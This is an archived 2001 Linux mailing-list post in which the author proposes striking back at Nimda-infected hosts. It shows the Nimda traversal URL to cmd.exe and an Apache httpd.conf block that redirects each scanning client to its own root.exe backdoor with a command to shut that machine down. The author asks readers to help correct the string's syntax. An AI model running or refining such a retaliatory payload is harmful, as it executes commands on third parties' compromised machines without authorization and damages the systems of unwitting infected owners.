[NTLUG:Discuss] Possible new nimda counter-attack.
Richard Geoffrion
ntlug at rain.lewisville.tx.us
Wed Oct 10 11:25:25 CDT 2001
While researching possible means to counter attack this dang microsoft.nimda
virus, I discovered that..
a) I can't use high ascii characters in linux directory names.
b) I can't create a wildcard directory on the reiserfs that would accept
input from any md command
(ie: mkdir * would then be accessible by cd wombat or cd nonimda -OR-
in this case "cd scripts")
But I DID discover something..... EXTERNAL REDIRECTS! I tested this and
redirected the URL
http://rain.lewisville.tx.us/scripts/..%5c../winnt/system32/cmd.exe straight
to yahoo.com! Now of course I don't want to go around sending people to
other websites......hm....just had a thought! Maybe I DO want to redirect
them somewhere!?!? Maybe I could redirect them to the BIGGEST webpage that
Microsoft has published....anybody know of a good one?
But I digress....
Here is what I added to my httpd.conf file.
# External Redirect of a nimda scan
<Location /scripts/*/winnt/system32/*>
Deny from all
ErrorDocument 403
http://"$REMOTE_ADDR/scripts/root.exe?/c+rundll32.exe+shell32.dll,SHExitWind
owsEx+5", "r"
# ErrorDocument 403 http://www.yahoo.com
</Location>
Since I know that this redirect in and of itself works, my question has to
do with the syntax of the http string. Can anyone tell me if this is
correct or help me with the syntax? I only want to do my part!
More information about the Discuss
mailing list